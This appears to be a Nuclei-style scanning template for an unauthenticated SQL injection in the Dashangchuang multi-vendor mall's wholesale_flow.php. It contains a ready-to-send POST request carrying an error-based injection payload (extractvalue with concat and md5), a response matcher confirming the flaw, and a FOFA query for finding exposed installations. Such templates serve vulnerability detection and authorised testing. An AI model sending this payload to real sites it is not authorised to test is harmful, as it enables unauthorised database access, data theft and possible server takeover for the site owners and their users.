http:
    - matchers:
        - part: body
          type: word
          words:
            - ~e10adc3949ba59abbe56e057f20f883
      raw:
        - |
          POST /wholesale_flow.php?step=ajax_update_cart HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
          Content-Type: application/x-www-form-urlencoded

          rec_ids[]=extractvalue(1,concat(0x7e,md5(123456)))
id: dashang-wholesale_flow_php-sql
info:
    author: Superhero
    description: |-
        fofa: body="dsc-choie"
        大商创多用户商城系统 wholesale_flow.php 接口处存在SQL注入漏洞，未经身份验证攻击者可通过输入恶意 SQL 代码，突破系统原本设定的访问规则，未经授权访问、修改或删除数据库中的各类敏感信息，包括但不限于员工个人资料、企业核心业务数据等。进一步利用可获取服务器权限。
    name: 大商创多用户商城系统 wholesale_flow.php SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247488286&idx=1&sn=4954f6b45afd6a4fa290d9a750f55162&chksm=c267a62df5102f3b11cde3067744819102965e96a33e227dca4345a956cd823652c36f126bf8&token=350950895&lang=zh_CN#rd
    severity: high
    tags: []
